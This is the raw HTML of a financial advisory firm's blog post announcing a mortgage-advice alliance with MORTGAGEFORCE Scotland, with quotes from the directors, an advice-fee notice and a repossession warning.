fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Mortgage Strategic Alliance										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Mortgage Strategic Alliance</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		&#13;\n										<div id=\"post-7307\" class=\"post-7307 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Mortgage Strategic Alliance</span>&#13;\n						<div class=\"post-content\">&#13;\n				<h1 style=\"text-align: center;\"><span style=\"color: #800000;\">Equity SMART and MORTGAGEFORCE Scotland Announce an Important Strategic Alliance</span></h1>&#13;\n<p> </p>&#13;\n<p/>&#13;\n<p><span style=\"line-height: 1.5em;\">With the mortgage market starting to pick up speed and the economy showing real signs of recovery, we are proud to announce a new strategic partnership with MORTGAGEFORCE Scotland.</span><span style=\"line-height: 1.5em;\"> </span></p>&#13;\n<p>This would see our clients mortgage requirements being looked after by a firm of specialists who’s business focuses purely on mortgages and for us to specialise in investment and pension planning.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">MORTGAGEFORCE are one of the largest mortgage brokers in the country which enables them to quickly and easily benchmark rates and deals across products from the whole of market, whilst their scale would continue to ensure that our clients can access money saving  broker exclusive products.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">MORTGAGEFORCE was proven to deliver the most timely and accurate price intelligence in the marketplace along with providing exceptional levels of customer service.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Yaz Hamir  Director says “<em>Our prime concern was to find a partner that understands the needs of our clients and could provide the right mortgage service and support for them.  MORTGAGEFORCE have gained an enviable reputation within the mortgage broker market with a team that has 25yrs+ industry experience to help ensure our high standards of service are maintained</em>” </span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Harry McGeough Director of MortgageForce says “<em>I’m looking forward to working with Tony and the team, as more lenders enter the UK marketplace competition for market share is becoming more intense. </em></span></p>&#13;\n<p><em><span style=\"line-height: 1.5em;\">Lenders are offering the lowest fixed rates ever at the moment, and with many of them allowing rates to be booked up to 6 months in advance, now is maybe the time to lock in a lower monthly payment, or even refinance to shave some years from the term and get your residence mortgage free sooner rather than later.</span></em></p>&#13;\n<p><span style=\"line-height: 1.5em;\"><em>Rates have never been so low, and we can very quickly establish what the best value option would be in your own circumstances and we look forward to providing our specialist advice and answer any mortgage questions for Equity SMART clients</em>“</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">If you do require advice on your mortgage, get an update on all available mortgage rates and  would welcome an initial review please get in touch here </span><a style=\"line-height: 1.5em;\" href=\"/\">enquiries@equalitywalk.org.uk</a><span style=\"line-height: 1.5em;\"> or all us direct on </span><strong style=\"line-height: 1.5em;\">.</strong></p>&#13;\n<p><strong style=\"line-height: 1.5em;\"><span style=\"line-height: 1.5em;\">Warmest regards<br/></span>Equity SMART</strong></p>&#13;\n<p><span style=\"line-height: 1.5em;\">There will be a fee for mortgage advice. The precise amount will depend upon your circumstances but we estimate that it will be£250.00</span><span style=\"line-height: 1.5em;\"> </span></p>&#13;\n<p>YOUR HOME OR PROPERTY MAY BE REPOSSESSED IF YOU DO NOT KEEP UP REPAYMENTS ON YOUR MORTGAGE</p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../mortgage-strategic-alliance/\" title=\"Comment on Mortgage Strategic Alliance\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/mortgage-strategic-alliance/&amp;p[title]=Mortgage%20Strategic%20Alliance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Mortgage+Strategic+Alliance+%20http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/mortgage-strategic-alliance/&amp;title=Mortgage%20Strategic%20Alliance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/mortgage-strategic-alliance/&amp;title=Mortgage%20Strategic%20Alliance\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fmortgage-strategic-alliance%2F&amp;name=Mortgage+Strategic+Alliance+&amp;description=Reid+Scott+%26amp%3B+Ross+and+MORTGAGEFORCE+Scotland+Announce+an+Important+Strategic+Alliance+%26nbsp%3B+With+the+mortgage+market+starting+to+pick+up+speed+and+the+economy+showing+real+signs+of+recovery%2C+we+are+proud+to+announce+a+new+strategic+partnership+with+MORTGAGEFORCE+Scotland.%C2%A0+This+would+see+%5B%26hellip%3B%5D\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Mortgage Strategic Alliance&amp;body=http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../mortgage-strategic-alliance/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"7307\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"1743e5074a\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"139\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer><footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = 